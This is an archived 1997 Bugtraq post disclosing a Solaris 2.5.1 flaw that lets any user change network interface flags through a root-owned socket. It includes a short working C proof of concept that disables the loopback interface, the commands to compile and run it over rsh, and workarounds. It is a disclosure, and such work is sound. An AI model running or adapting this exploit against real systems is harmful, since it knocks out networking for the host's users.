Bugtraq: Solaris 2.5.1 party piece

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Solaris 2.5.1 party piece

From: alan () LXORGUK UKUU ORG UK (Alan Cox)
Date: Thu, 19 Jun 1997 15:27:39 +0100


 Well CERT have had this for a year, AUSCERT for a couple of weeks and
now its time bugtraq had it

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck


 solarisuck.c

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>


int main(int argc, char *argv[])
{
        struct ifreq please_break_me;

        strcpy( please_break_me.ifr_name, "lo0");
        please_break_me.ifr_flags=0;

        if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
                perror("Damn it didnt work. Obviously not Solaris ;)");
}


You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.


Workarounds:
 1.  Disable rsh and any non root owned inetd tasks -  breaks remote tar etc
 2.  Run an OS that the vendor doesnt take a year to fix bugs in

 I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
 to prove Sun have sat on this for ages.

 Alan

By Date By Thread

Current thread:

Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
  - Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
    - Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
    - Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
    - http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
    - Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)